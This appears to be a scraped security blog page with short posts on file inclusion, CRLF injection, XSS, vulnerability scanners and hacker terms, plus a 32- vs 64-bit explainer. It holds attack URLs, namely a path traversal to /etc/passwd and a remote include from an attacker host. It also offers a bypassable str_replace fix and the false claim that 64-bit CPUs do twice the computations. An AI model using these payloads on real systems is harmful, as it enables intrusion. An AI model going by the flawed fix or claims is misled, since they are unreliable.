include(“pages/$file”);
}
else
{
include(“index.php”);
}
?>

The original request will look like this:
http://www.test.com/index.php?id =contact.php
The attacker will execute the following script:
http://www.test.com/index.php?id =../../../../etc/passwd
This will give the password on the server
The countermeasure of this attack is to modify the php $file variable script as follows:
$file = str_replace(‘../’, ‘ ’, $_GET[‘file’]);
The LFI attack will not work after replacing above line.

Remote File Inclusion (RFI)

Remote File Inclusion (RFI) is an attack that targets the computer servers that run Web sites and their applications. RFI exploits are most often attributed to the PHP programming language used by many large firms including Facebook and SugarCRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference external scripts indicated by user input without proper sanitation. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
Remote File Inclusion (RFI) is caused by insufficient validation of user input provided as parameters to a Web application. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application’s server. Since the attacker’s code is thus executed on the Web server it might be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
The RFI attack vector includes a URL reference to the remotely hosted code. Most attacks include two steps.

• In the first step, the attack vector references a simple validation script, usually capable of printing some distinguished output to the HTML page. If the validation script is successfully executed by the server under attack,
• The attacker proceeds with a second vector that references the actual payload script. The servers hosting the script are either compromised servers or file sharing services.

The remote file inclusion attack allow an attacker to execute from anywhere a malicious file/script.
The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website. With RFL attack an attacker can get access of the server.
Let the vulnerable page is :
http://www.test.com/index.php?page =office
This web page is getting  a document in the text format from server which include php include function to get the page.
The attacker can execute a script instead of the genuine page as follows:
http://www.test.com/index.php?page =http://www.hackersite.com/maliciousscript.txt

Preventing File Inclusions (RFI - LFI) Vulnerabilities

The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web Application Firewall (WAF). Detection and blocking of such attacks can be enhanced by creating a blacklist of attack sources and a black-list of URLs of remotely included malicious scripts:

• Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.
• A blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications.
• The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.

Like it ? Share it.

Read More

HTTP response splitting

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard (RFC 2616), headers are separated by one CRLF and the response's headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.

CRLF Injection

CRLF refers to the special character elements "Carriage Return" and "Line Feed". These elements are embedded in HTTP headers and other software code to signify an End of Line (EOL) marker. Many internet protocols, including MIME (e-mail), NNTP (newsgroups) and more importantly HTTP use CRLF sequences to split text streams into discrete elements. Web application developers split HTTP and other headers based on where CRLF is located. Exploits occur when an attacker is able to inject a CRLF sequence into an HTTP stream. By introducing this unexpected CRLF injection, the attacker is able to maliciously exploit CRLF vulnerabilities in order to manipulate the web application's functions.
A more formal name for CRLF Injection is Improper Neutralization of CRLF Sequences. Because CRLF injection is frequently used to split HTTP responses, it can also be designated as HTTP Response Splitting or Improper Neutralization of CRLF Sequences in HTTP Headers.

Key Concepts of CRLF Injection

CRLF Injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. When CRLF Injection is used to split a HTTP response header it is referred to as HTTP Response Splitting. CRLF Injection vulnerabilities result from data input that is not neutralized, incorrectly neutralized, or otherwise unsanitized.
Attackers provide specially crafted text streams with CRLF injections in order to trick the web application to perform unexpected and potentially harmful actions ranging from medium to high severity. Attackers exploit the CRLF Injection vulnerability by injecting CRLF sequences in order to split a text stream to embed text sequences that the web application is not expecting. These unexpected CRLF injections can result in a security breach and cause material harm.
CRLF Injection exploits security vulnerabilities at the application layer. By exploting the CRLF Injection flaw in an HTTP response for example, attackers can modify application data compromising integrity and enabling the exploitation of the following vulnerabilities:

• XSS or Cross Site Sripting vulnerabilities
• Proxy and web server cache poisoning
• Web site defacement
• Hijacking the client's session
• Client web browser poisoning

Explaining CRLF Injection Through Examples

Let's examine how CRLF Injections cause damage by looking at one of the most basic example of a CRLF attack: adding fake entries into log files. Suppose a vulnerable application accepts unsanitized or improperly neutralized data and writes it to a system log file. An attacker supplies the following input:

Because this error is fake, a sysadmin may waste a lot of time troubleshooting a non-existent error. An attacker could use this type of Trojan to distract the admin while attacking the system somewhere else.
Another way to illustrate how CRLF Injections can cause severe harm is through an application that accepts a file name as user input and then executes a relatively harmless command on that file such as "ls –a ." If the application is vulnerable to CRLF injection because of improperly neutralized or unsanitized data input, an attacker could provide the following input:

This CRLF Injection attack could wipe out the entire file system if the application were running with root privileges on a linux/unix system!

Preventing HTTP Response Splitting Vulnerabilities

Fortunately, HTTP response splitting are easy to prevent:
Always follow the rule of never trusting user input
Sanitize and neutralize all user supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.

Like it ? Share it.

Read More

Cross-Site Scripting (XSS)

Cross-Site Scripting (also known as XSS) is one of the most common application-layer web attacks. XSS vulnerabilities target scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages such as HTML and JavaScript. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.
XSS is the most common security vulnerability in software today. This should not be the case as XSS is easy to find and easy to fix. XSS vulnerabilities can have consequences such as tampering and sensitive data theft.

Key Concepts of a Cross-Site Scripting Attack

1. XSS is a Web-based attack performed on vulnerable Web applications
2. In XSS attacks, the victim is the user and not the application
3. In XSS attacks, malicious content is delivered to users using JavaScript

Explaining Cross-Site Scripting

An XSS vulnerability arises when Web applications take data from users and dynamically include it in Web pages without first properly validating the data. XSS vulnerabilities allow an attacker to execute arbitrary commands and display arbitrary content in a victim user's browser. A successful XSS attack leads to an attacker controlling the victim’s browser or account on the vulnerable Web application. Although XSS is enabled by vulnerable pages in a Web application, the victims of an XSS attack are the application's users, not the application itself. The potency of an XSS vulnerability lies in the fact that the malicious code executes in the context of the victim's session, allowing the attacker to bypass normal security restrictions.

XSS Attack Examples

• Reflective XSS - There are many ways in which an attacker can entice a victim into initiating a reflective XSS request. For example, the attacker could send the victim a misleading email with a link containing malicious JavaScript. If the victim clicks on the link, the HTTP request is initiated from the victim's browser and sent to the vulnerable Web application. The malicious JavaScript is then reflected back to the victim's browser, where it is executed in the context of the victim user's session.
• Persistent XSS - Consider a Web application that allows users to enter a user name which is displayed on each user’s profile page. The application stores each user name in a local database. A malicious user notices that the Web application fails to sanitize the user name field and inputs malicious JavaScript code as part of their user name. When other users view the attacker’s profile page, the malicious code automatically executes in the context of their session.

Identifying Cross-Site Scripting Vulnerabilities

XSS vulnerabilities may occur if:

• Input coming into Web applications is not validated
• Output to the browser is not HTML encoded

Impact of Cross-Site Scripting

When attackers succeed in exploiting XSS vulnerabilities, they can gain access to account credentials. They can also spread Web worms or access the user’s computer and view the user’s browser history or control the browser remotely. After gaining control to the victim’s system, attackers can also analyze and use other intranet applications.
By exploiting XSS vulnerabilities, an attacker can perform malicious actions, such as:

• Hijack an account
• Spread Web worms
• Access browser history and clipboard contents
• Control the browser remotely
• Scan and exploit intranet appliances and applications

Preventing Cross Site Scripting (XSS) Vulnerabilities

XSS can only be prevented by carefully sanitizing all input which is not known to be secure. Classes of input which is known NOT to be secure include:

• HTTP referrer objects
• The URL
• GET parameters
• POST parameters
• Window.location
• Document.referrer
• document.location
• document.URLUnencoded
• All headers
• Cookie data
• Potentially data from your own database (if not properly validated on input)

Preventing XSS is an arduous job - all the values found via the above method must be checked for XSS attack vectors, which come in many forms. For instance, the same XSS code may come in a dozen different forms, based on how it is encoded and special characters placed inside.
If it is possible to whitelist data being input, then create a careful filter to whitelist the input.
Alternately, if the data is never output to a user's browser, then it cannot be used in an XSS attack. Be careful relying on this method, as other attacks, such as HTTP Response Header Splitting or SQL Injection attacks use similar untrusted data sources to perform other types of attacks.
The best defense is to escape all user input. The level of escaping and how it should be implemented will be dependent on the specific site requirements. For instance, some sites wish to allow users to add some HTML tags, while others have no need of such functionality, and can more aggressively scan.

Like it ? Share it.

Read More

Difference between 32-bit and 64-bit

What is Bits?
The number of bits in a processor refers to the size of the data types that it handles and the size of its registry.

What is 32 Bit ?
In computer architecture, 32-bit integers, memory addresses, or other data units are those that are at most 32 bits (4 octets) wide. Also, 32-bit CPU and ALU architectures are those that are based on registers, address buses, or data buses of that size. 32-bit is also a term given to a generation of microcomputers in which 32-bit microprocessors are the norm.

What is 64 Bit ?
In computer architecture, 64-bit computing is the use of processors that have datapath widths, integer size, and memory addresses widths of 64 bits (eight octets). Also, 64-bit CPU and ALU architectures are those that are based on registers, address buses, or data buses of that size. From the software perspective, 64-bit computing means the use of code with 64-bit virtual memory addresses.

What is the difference between 32-bit and 64-bit ?
In computing, 32-bit and 64-bit are two different types of processors. The bit number (usually 8, 16, 32, or 64) refers to how much memory a processor can access from the CPU register.
64-bit processors are capable of twice the number of computations per second of a 32-bit processor. It means 64-bit has capability to perform more faster than 32-bit. Now a days All manufactures developing their own products based on 64-bit So you can say 64-bit will be a future of computer but there are many software programs which doesn't support a 64-bit OS. They are upgrading there services soon we will see how 64-bit performing in every home, office and other places. It is important to note that 64-bit computers can still use 32-bit based software programs, even when the Windows operating system is a 64-bit version.
One more difference between 32 bit and 64 bit that is the maximum amount of memory (RAM) that is supported. 32-bit computers support a maximum of 3-4 GB of memory, whereas a 64-bit computer can support memory amounts over 4 GB. This is important for software programs that are used for graphical design, engineering design or video editing, where many calculations are performed to render images, drawings, and video footage.
64-bit processors are becoming more and more common place in home computers. Most manufacturers build computers with 64-bit processors due to cheaper prices and because more users are now using 64-bit operating systems and programs. Computer parts retailers are offering fewer and fewer 32-bit processors and soon may not offer any at all.
At the end I want to say if you are planning to purchase a new Operating system get a 64-bit architecture system otherwise soon you will trash it as well if our system has more than 4 GB RAM then start using 64-bit system right now for getting benefit and experience the speed.  

Like it ? Share it.

Read More

Top 5 Free Vulnerabilities Scanner Tool

I have seen People ask How to hack website without any basic knowledge about hacking. You should know how hacks work - If you want to hack anything in this world you have to find out their weakness and then try to exploit them. Web site security is very important because the website contain relevant information about a company and now a days website defacement is very common even a script kiddies and a new born hackers can do this. The most common vulnerability like SQL-Injection and cross site scripting lead towards the defacement. So you want to secure your web application than find vulnerabilities on it before a hacker find it.
Below are Top tools for finding vulnerabilities :

1. W3AF -  w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities. This cross-platform tool is available in all of the popular operating systems such as Microsoft Windows, Linux, Mac OS X, FreeBSD and OpenBSD and is written in the Python programming language. Users have the choice between a graphic user interface and a command-line interface. w3af identifies most web application vulnerabilities using more than 130 plug-ins. After identification, vulnerabilities like (blind) SQL injections, OS commanding, remote file inclusions (PHP), cross-site scripting (XSS), and unsafe file uploads, can be exploited in order to gain different types of access to the remote system.

How to use w3af


2. Vega - Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.
Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. It is available on Kali Linux and Backtrack.

How to use Vega

3. Nikto - Nikto is one of the most popular web security application when you are beginning a web pentesting project. Nikto is a web application scanning tool that searches for misconfigurations, openly accessible web directories and a host of web application vulnerabilities. This is available on the famous Linux distribution like Kali Linux, Backtrack, Gnacktrack, Backbox and others.

How to use Nikto 

4. Zed Attack Proxy (ZAP) - OWASP or Open Web Application Security Project is a non profit organisation world wide that are focusing on improving the security of web application. The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It has an automatic scanning functionality and it has a set of tools that allow you to find vulnerability manually.

5. Skipfish - Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments. 

Like it ? Share it.

Read More

The Hacker's theory

What is Hacking - Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.

Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it's not limited to either of them.

Who is Hacker - A Hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.

Type of Hackers:

White Hat - A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software. The term "white hat" in Internet slang refers to an ethical hacker. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement. The EC-Council, also known as the International Council of Electronic Commerce Consultants, is one of those organizations that have developed certifications, course-ware, classes, and online training covering the diverse arena of Ethical Hacking.

Grey Hat - A grey hat hacker is a combination of a black hat and a white hat hacker. A grey hat hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example. Then they may offer to correct the defect for a fee.

Black Hat - A "black hat" hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain". Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network. Black hat hackers also are referred to as the "crackers" within the security industry and by modern programmers. Crackers keep the awareness of the vulnerabilities to themselves and do not notify the general public or manufacturer for patches to be applied. Individual freedom and accessibility is promoted over privacy and security. Once they have gained control over a system, they may apply patches or fixes to the system only to keep their reigning control.

Basic Requirement:

• Knowledge of Networking
• Ethical Hacking Certification (This will make you a Certified Ethical Hacker)
• Programming Knowledge 
• Read and Learn
• Practice as much as you can

What is Exploits - Exploit is an attack on a computer system, especially one that takes advantage of a particular vulnerability that the system offers to intruders. Used as a verb, the term refers to the act of successfully making such an attack.

What is Vulnerability - In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface.

What is Bug - A bug is an error, flaw, failure, or fault in a computer program or system that causes it to produce an incorrect or unexpected result, or to behave in unintended ways. Most bugs arise from mistakes and errors made by people in either a program's source code or its design, or in frameworks and operating systems used by such programs, and a few are caused by compilers producing incorrect code. A program that contains a large number of bugs, and/or bugs that seriously interfere with its functionality, is said to be buggy. Reports detailing bugs in a program are commonly known as bug reports, defect reports, fault reports, problem reports, trouble reports, change requests, and so forth.

Like it ? Share it.

Read More